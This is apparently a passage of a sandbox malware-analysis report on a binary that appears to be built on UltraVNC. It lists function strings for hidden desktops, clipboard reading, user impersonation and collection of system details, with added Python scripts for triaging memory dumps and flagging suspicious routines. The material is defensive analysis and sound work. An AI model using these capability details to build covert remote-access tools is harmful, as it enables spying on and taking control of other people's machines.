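SAMPLE_DUMP = (b"\x00" * 16
               + b"uvnc_service\x00"
               + b"mv video hook driver2\x00"
               + "Winsta0\\Winlogon".encode("utf-16-le") + b"\x00\x00"
               + b"\x00" * 8)


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_DUMP
    result = triage(blob)
    print(f"score={result['score']} verdict={result['verdict']}")
    for group, markers in result["hits"].items():
        print(f"  {group}: {markers}")
```

Run it as `python uvnc_triage.py <dump.sdmp>`; with no argument it scores the constructed sample. On a live host the service name from the same record can be checked directly with `sc query uvnc_service`.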
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Global$Clipboard$AvailableByteCharDataFormatLockMultiSizeUnlockWide$Open
                                                                      • String ID:
                                                                      • API String ID: 1939172783-0
                                                                      • Opcode ID: 0b3bb09cbdecdb7f57cc64d09ea6752ff0ca7fb8838ecbd0261cdb65b0b51056
                                                                      • Instruction ID: 0aff9de7bf33255f11aae7901925f02ff6fbfbf58aa39169b19ea90b7d2e5bb4
                                                                      • Opcode Fuzzy Hash: 0b3bb09cbdecdb7f57cc64d09ea6752ff0ca7fb8838ecbd0261cdb65b0b51056
                                                                      • Instruction Fuzzy Hash: 06815335A09B4A86E664BF22B92037AB3A0FF44F81B845135DE5D87795EF3CE424C712
                                                                      APIs
                                                                      Strings
                                                                      • HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x), xrefs: 00007FF7E507AA26
                                                                      • HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x), xrefs: 00007FF7E507AAC1
                                                                      • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x), xrefs: 00007FF7E507A94D
                                                                      • HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x), xrefs: 00007FF7E507AB1D
                                                                      • HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x), xrefs: 00007FF7E507A9BB
                                                                      • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x, xrefs: 00007FF7E507A97B
                                                                      • HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x, xrefs: 00007FF7E507A9E6
                                                                      • HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x, xrefs: 00007FF7E507AA4D
                                                                      • HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x, xrefs: 00007FF7E507AAE1
                                                                      • HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x, xrefs: 00007FF7E507AB3F
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ErrorInfoLastParametersSystem
                                                                      • String ID: HideDesktop.cpp : Failed to get SPI value for SPI_GETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Failed to get SPI value for SPI_GETFONTSMOOTHINGTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETCLEARTYPE (0x%08x)$HideDesktop.cpp : Failed to set SPI value for SPI_SETFONTSMOOTHING (0x%08x)$HideDesktop.cpp : Retrieved SPI value for SPI_GETCLEARTYPE: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHING: 0x%08x$HideDesktop.cpp : Retrieved SPI value for SPI_GETFONTSMOOTHINGTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETCLEARTYPE: 0x%08x$HideDesktop.cpp : Set SPI value for SPI_SETFONTSMOOTHING: 0x%08x
                                                                      • API String ID: 2777246624-1480653996
                                                                      • Opcode ID: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
                                                                      • Instruction ID: dc78872f71e1b3ae1cdd0c02643a961fd228a6000c1b9fa5ef9d1a6e3a8acc16
                                                                      • Opcode Fuzzy Hash: 2f3f2611d4a2bfd02228de316762cf01d85ca1b5bfadb3604ef3ee04cef68530
                                                                      • Instruction Fuzzy Hash: 3C511561E0858F95F720BB68B930BB5A7A1AF94B44FC45033E40DC25A9EE3CA519C373
                                                                      APIs
                                                                      Strings
                                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked, xrefs: 00007FF7E509C3A7
                                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call, xrefs: 00007FF7E509C2F4
                                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error, xrefs: 00007FF7E509C43D
                                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s, xrefs: 00007FF7E509C3DC
                                                                      • g, xrefs: 00007FF7E509C31B
                                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1, xrefs: 00007FF7E509C37E
                                                                      • vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed, xrefs: 00007FF7E509C455
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CriticalSection$Leave$Enter
                                                                      • String ID: g$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - 1$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - Call$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - OpenProcessToken Error$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - WSLocked$vncclient.cpp : %%%%%%%%%%%%% vncClient::DoFTUserImpersonation - currentUser = %s
                                                                      • API String ID: 2978645861-1267036565
                                                                      • Opcode ID: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                                      • Instruction ID: 368fd7911ed5f3413f59dd642ffef68d789cf76b9c83bf2bcfb553d9453a3adc
                                                                      • Opcode Fuzzy Hash: bdb4852c987baf4b60644aebab38a863e7ba7580bc742476bcdc9009847be20c
                                                                      • Instruction Fuzzy Hash: C8515561A1C58A95F660BB25A8343FAA391FF85F51FC41033E94EC6298DE3DD405C762
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: DeleteObjectRectfree$CombineCreateCriticalEventSection$EnterErrorFreeHeapLastLeave_errnomalloc
                                                                      • String ID: \$vncclient.cpp : FATAL! client update region is empty!
                                                                      • API String ID: 1264956880-3227535004
                                                                      • Opcode ID: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                                      • Instruction ID: cde0a119aff02111e618bd49156f6a7c0000289d4a3db8d7d7d3300b8ef9b7ab
                                                                      • Opcode Fuzzy Hash: 23a49fa5f1be814596b27dce1756cea377cd1ca12dee1e05d8a6d5d454cb436e
                                                                      • Instruction Fuzzy Hash: 09A10532614A9A8AD750EF1AE454B6AB7A8FBC8F90F415036EE4E83754DF3DD805CB10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MSIL Processor)$Current user :
                                                                      • API String ID: 171970310-1756215141
                                                                      • Opcode ID: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                                      • Instruction ID: 9e4a52e97373f608b08790c932a68ef852a09582b9d84ddcc330137be8b1f6c6
                                                                      • Opcode Fuzzy Hash: e292ff1ab8a2ec860fca5fdae839fd5dac6431b32c19bd64026a63d2d728b1e0
                                                                      • Instruction Fuzzy Hash: BDB18421A0868985E761AB3598203B977A0FB05BB0F804337E67EC39D9DF3CE515C361
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (MIPS Processor)$Current user :
                                                                      • API String ID: 171970310-18614430
                                                                      • Opcode ID: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                                      • Instruction ID: e2b502f9698e367d76532b399076fda02443964d0b20f55e462f27f6bdf5f50d
                                                                      • Opcode Fuzzy Hash: 13559806fcd846485afb22cc621461796e5ecc486d2cf5f10f95b5e9e7543de7
                                                                      • Instruction Fuzzy Hash: 99B18421A0868985E761AB35A8203B977A0FB05BB4F804337E67DC39D9DF3CE555C321
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (ARM Processor)$Current user :
                                                                      • API String ID: 171970310-978419383
                                                                      • Opcode ID: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                                      • Instruction ID: 8bc26181780a19740332c9b6610feb7be0611139676a55bec6e23c209de62a95
                                                                      • Opcode Fuzzy Hash: a8d8f491f9732d8cee92c56ad349269dc42da93c27ec5ad26cc636e7eff597dc
                                                                      • Instruction Fuzzy Hash: 1DB18521A0868A85E761EB3598203B977A0FB04BB0F804337E67EC79D9DF38E515C321
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (SHX Processor)$Current user :
                                                                      • API String ID: 171970310-3227166451
                                                                      • Opcode ID: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                                      • Instruction ID: c07862cc0c5e61241434e29a6e56362d288a2944172cde9f41bd87d030666f28
                                                                      • Opcode Fuzzy Hash: f87aec30509e434426b08c2f6c773820ec2921cd93d1ed894a2fb9928649058d
                                                                      • Instruction Fuzzy Hash: DCB18521A0868985E761EB3598203B977A0FB05BB0F804337E67EC79D9DF38E555C321
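The five records above that share the API ID `sprintf$NameUser_errno_invalid_parameter_noinfo` and differ only in the processor-name string (MSIL, MIPS, ARM, SHX and, below, Alpha) are one system-information routine that the report lists once per string table; their `API String ID` values all begin with `171970310`, while the clipboard record (`1939172783-0`, empty String ID) and the `DoFTUserImpersonation` record have their own prefixes. The following script is an added example, not Joe Sandbox code: it parses records in the bullet format this report uses, groups them by the first half of `API String ID`, flags records whose API or string set mentions clipboard access or token impersonation, and compares `Instruction Fuzzy Hash` values position by position to surface near-identical routines. The sample records are copied from this page with the long String IDs trimmed; the positional comparison is an assumed metric chosen for illustration, not the report's own similarity measure.

```python
"""Group Joe Sandbox per-function records into routine families.

Added example for this report page, not Joe Sandbox's own code. It parses the
'API ID / String ID / API String ID / Opcode ID / Instruction Fuzzy Hash'
bullets printed for every analysed function and shows which records share one
API profile and which are near-identical at the instruction level.
"""
import re
from collections import defaultdict

# Record fields we keep; everything else (Source File, Associated, ...) is ignored.
FIELDS = {"API ID", "String ID", "API String ID", "Opcode ID",
          "Instruction ID", "Opcode Fuzzy Hash", "Instruction Fuzzy Hash"}
BULLET = re.compile(r"^\s*•\s*([A-Za-z ]+?):\s*(.*)$")

# Substrings in an API ID or String ID worth a second look in a remote-control
# tool (clipboard read/write, token impersonation, keyboard hooks).
WATCH = ("Clipboard", "Impersonat", "Token", "Hook")

# Constructed sample: six records copied from this report, String IDs trimmed.
SAMPLE = """\
• Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
• API ID: Global$Clipboard$AvailableByteCharDataFormatLockMultiSizeUnlockWide$Open
• String ID:
• API String ID: 1939172783-0
• Instruction Fuzzy Hash: 06815335A09B4A86E664BF22B92037AB3A0FF44F81B845135DE5D87795EF3CE424C712
• API ID: CriticalSection$Leave$Enter
• String ID: vncclient.cpp : vncClient::DoFTUserImpersonation - ImpersonateLoggedOnUser Failed$vncclient.cpp : vncClient::DoFTUserImpersonation - OpenProcessToken Error
• API String ID: 2978645861-1267036565
• Instruction Fuzzy Hash: C8515561A1C58A95F660BB25A8343FAA391FF85F51FC41033E94EC6298DE3DD405C762
• API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
• String ID: ComputerName : $IP : $ Build:%d$, (MSIL Processor)$Current user :
• API String ID: 171970310-1756215141
• Instruction Fuzzy Hash: BDB18421A0868985E761AB3598203B977A0FB05BB0F804337E67EC39D9DF3CE515C361
• API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
• String ID: ComputerName : $IP : $ Build:%d$, (MIPS Processor)$Current user :
• API String ID: 171970310-18614430
• Instruction Fuzzy Hash: 99B18421A0868985E761AB35A8203B977A0FB05BB4F804337E67DC39D9DF3CE555C321
• API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
• String ID: ComputerName : $IP : $ Build:%d$, (ARM Processor)$Current user :
• API String ID: 171970310-978419383
• Instruction Fuzzy Hash: 1DB18521A0868A85E761EB3598203B977A0FB04BB0F804337E67EC79D9DF38E515C321
• API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
• String ID: ComputerName : $IP : $ Build:%d$, (SHX Processor)$Current user :
• API String ID: 171970310-3227166451
• Instruction Fuzzy Hash: DCB18521A0868985E761EB3598203B977A0FB05BB0F804337E67EC79D9DF38E555C321
"""


def parse_records(text):
    """Split the bullet listing into one dict per function record."""
    records, current = [], None
    for line in text.splitlines():
        m = BULLET.match(line)
        if not m or m.group(1) not in FIELDS:
            continue
        field, value = m.group(1), m.group(2).strip()
        if field == "API ID":          # every record starts with its API ID
            current = {}
            records.append(current)
        if current is not None:
            current[field] = value
    return records


def api_family(record):
    """First half of 'API String ID': in this report it tracks the API set
    (all sysinfo variants share 171970310), the second half the string set."""
    return record.get("API String ID", "-").split("-")[0]


def family_groups(records):
    groups = defaultdict(list)
    for r in records:
        groups[api_family(r)].append(r)
    return dict(groups)


def fuzzy_similarity(a, b):
    """Fraction of equal positions between two fuzzy hashes of equal length.
    Assumed metric for illustration; 0.0 when lengths differ."""
    if not a or len(a) != len(b):
        return 0.0
    return sum(x == y for x, y in zip(a, b)) / len(a)


def find_variants(records, threshold=0.8):
    """Index pairs whose Instruction Fuzzy Hash is at least `threshold` similar."""
    out = []
    for i in range(len(records)):
        for j in range(i + 1, len(records)):
            s = fuzzy_similarity(records[i].get("Instruction Fuzzy Hash", ""),
                                 records[j].get("Instruction Fuzzy Hash", ""))
            if s >= threshold:
                out.append((i, j, round(s, 3)))
    return out


def flag_records(records):
    """Records whose API ID or String ID contains a WATCH substring."""
    flagged = []
    for i, r in enumerate(records):
        blob = r.get("API ID", "") + " " + r.get("String ID", "")
        hits = [w for w in WATCH if w in blob]
        if hits:
            flagged.append((i, hits))
    return flagged


if __name__ == "__main__":
    recs = parse_records(SAMPLE)
    for fam, members in family_groups(recs).items():
        print(fam, [m["String ID"][:45] for m in members])
    print("variants:", find_variants(recs))
    print("flagged:", flag_records(recs))
```

Run against a whole report export, the family grouping collapses compiler-generated string-table variants into one routine, and the variant pairs highlight the same collapse from the opcode side; the flag list is where a triager starts reading (here the clipboard reader and the file-transfer impersonation routine).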
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000017.00000002.3170882784.00007FF7E5071000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7E5070000, based on PE: true
                                                                      • Associated: 00000017.00000002.3170856075.00007FF7E5070000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3170973291.00007FF7E5149000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171022945.00007FF7E517D000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171045471.00007FF7E517F000.00000008.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E5180000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51CB000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171078272.00007FF7E51F8000.00000004.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E5231000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52A4000.00000002.00000001.01000000.00000007.sdmp
                                                                      • Associated: 00000017.00000002.3171194684.00007FF7E52EC000.00000002.00000001.01000000.00000007.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_23_2_7ff7e5070000_sync_browser.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Alpha Processor)$Current user :
                                                                      • API String ID: 171970310-733379141
                                                                      • Opcode ID: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                                      • Instruction ID: 6264ae0142e9abc46da50a26b1c972416681307278d698e8f3492d79331715eb
                                                                      • Opcode Fuzzy Hash: fb41818708b430e62bf73831d052d0c4d926f05be827444239f89a711e28a3fb
                                                                      • Instruction Fuzzy Hash: 2CB18521A0868A85E761EB3598213B977A0FB05BB4F804337E67EC79D9DF38E515C321
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: sprintf$NameUser_errno_invalid_parameter_noinfo
                                                                      • String ID: ComputerName : $IP : $ Build:%d$ Service Pack: 6a$ v%d.$%02d$, (Intel Processor)$Current user :
                                                                      • API String ID: 171970310-3029765189
                                                                      • Opcode ID: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                                      • Instruction ID: d6c513aa36563b652ad9c6662c3539ed6e10c77dbf2d37a9b2277c7a84d63854
                                                                      • Opcode Fuzzy Hash: 1cb7e10b7cb412b861b46b02bdf6de15515886615ce791076c371ea6f230fb72
                                                                      • Instruction Fuzzy Hash: A5B19721A0868A85E761EB3594203B977A0FB04BB0F804337E67EC79D5DF38E555C321
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$AddressFreeLoadProc$Sleep$DebugErrorLastOutputStringsprintf
                                                                      • String ID: LockWorkStation$LockWorkstation failed with error 0x%0X$WinStationConnectW$user32.dll$winsta.dll
                                                                      • API String ID: 2931780912-670137772
                                                                      • Opcode ID: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                                      • Instruction ID: bbaf930df641cafa58e8df7c97c0b3ae39cff7ae889df201635ffd18f5b557ce
                                                                      • Opcode Fuzzy Hash: 4c941a38a0d861067d34bbbc45676cf3eae1c23976c0e3f2b532e901046bab96
                                                                      • Instruction Fuzzy Hash: 12314C25A18A4B81EA21FF26B5747B9A3A1FF44F91FC41433D90E86658EF3CE4058762
                                                                      APIs
                                                                      Strings
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: CloseHandleProcess$OpenWindow$CreateErrorFileFindLastModuleNameThreadTokenUser
                                                                      • String ID: -settingshelper$Shell_TrayWnd$Winsta0\Default
